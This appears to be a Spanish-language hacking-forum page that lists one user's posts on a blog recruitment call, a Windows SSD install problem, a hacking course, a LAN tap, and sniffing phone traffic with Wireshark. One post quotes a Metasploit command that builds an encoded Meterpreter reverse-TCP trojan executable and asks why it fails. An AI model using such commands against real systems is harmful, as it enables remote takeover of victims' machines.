elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Foro Libre / Buscamos nuevos integrantes para HDC! en: 15 Marzo 2017, 21:20 pm
Buen dia a todos!

Soy Roadd de HDC (hackingd0.blogspot.com) y estamos en coordinación de agrandar el equipo y viendo proyectos hacia adelante. Las clases están programadas para salir cada 3 semanas aproximadamente, pero entiendo que puede variar. :) Los requisitos son simplemente tomarse el trabajo de escribir y hacerlo claro.

Los puestos necesarios a cubrir son: web hacking, electrónica, CM, diseño gráfico, informática forense y un autor de temas en general para cubrir cualquier área.

Si quieren participar del proyecto aportando algo y creen que pueden hacerlo están invitados a mandarme un correo o por privado :).

Saludos, Roadd.
2  Programación / Scripting / Analizador lexico/sintactico en: 5 Mayo 2015, 15:35 pm
Hay algun software con soporte vigente, de analisis lexico/sintactico para el español y que sea extenso? (sobre todo me seria excelente de codigo libre, multiplataforma)
3  Sistemas Operativos / Windows / Ultrabook Windows 7 en SSD en: 29 Abril 2014, 23:25 pm
Gente necesito hacer una consulta.
Tengo una ultrabook samsung con el disco hibrido, es decir que tengo 2 discos (un ssd y un hd)
como originalmente me vino con W8 y la verdad es que tuve muchos problemas, decidi desinstalarlo y con el limpiar absolutamente todo el disco. Luego, instale un Kali que es un Linux Debian modificado (que me dejo instalar en el SSD pero no arrancaba el grub). Ahroa necesito laburar con W7, por lo que entonces desinstale el linux y limpie todo de los discos. Pero no me deja instalar el W7 en el SSD.

Me dice algo como que el bios no lo reconoce como disco de arranque

Intente cambiarle todo de las configuraciones del bios (es decir, secure boot, HCMI, deshabilite los booteos, cambie a UEFI, UEFI and CMS, CMS only, etc).

Y con un linux puedo administrar las particiones perfectamente, formatearlas y etc pero de cualquier manera no me deja :/.

Alguna idea?
4  Seguridad Informática / Seguridad / Curso: Hacking desde cero en: 13 Febrero 2014, 14:04 pm
Perdón por la promoción de mi curso. Pero quería comentarles que estoy haciendo. un curso de Hacking desde cero. Por si os gusta, es completamente gratuito y libre! Seguiré subiendo material todas las semanas y, si el tiempo lo permite, el cronograma cuenta con cientos de tutoriales

www.udemy.com/hackingdesdecero
5  Informática / Hardware / Throwing star lan tap en: 7 Enero 2014, 20:07 pm
Alguien tiene el PCB o el esquemático del Throwing star lan tap?
Para el que no sabe que es:
6  Seguridad Informática / Hacking / Wireshark - Celular en: 27 Febrero 2013, 00:52 am
Buenas. Hace poco adquiri un Galaxy SIII y estuve bajandome todo tipo de programas. Entre ellos el Whatsapp Sniffer (que ya no funciona, porque los mensajes son cifrados, en una de las versiones actualizadas de whatsapp), y entonces quise capturar los paquetes de datos que el celular manda.
Aclaro que yo de esto, mucho no se. pero igualmente quise intentar. puse el wireshark desde W7 y filtre los resultados ip.addr == 192.168.1.X donde esta la ip de mi celular en la red interna. pero extrañamente no captura NINGUN tipo de dato.  Ya sea Whatsapp, por navegador, o cualquiera sea la aplicacion.

Quisiera saber si alguno tiene idea de como capturar los datos del celular. porque al parecer estoy haciendo algo mal y lo que mi celular mande, no llega por ningun lado al wireshark.
Me parecio interesante! Saludos.
7  Seguridad Informática / Análisis y Diseño de Malware / Error troyano metasploit en: 4 Diciembre 2012, 20:45 pm
Buenas, que tal. Tengo un problema al intentar crear un troyano con Metasploit en BackTrack 5 r2 dentro de Oracle VM VirtualBox en Ubuntu.
Esto es lo que estaría en la consola:

Citar
msf > msfpayload windows/metrpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4321 R | msfencode -t exe -e x86/shikata_ga_nai >> prueba.exe

también intenté cambiando el LHOST por mi IP dentro de la red local pero aún así no funciona.

el error:
Citar
[-] No encoders succeded

ni siquiera alguna otra pista, sólo eso. el archivo se crea igual pero al tratar de ejecutarlo en windows xp sp2+ (versión identificada por nmap), me tira el error  "prueba.exe no es una aplicacion Win32 valida."

alguna idea?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines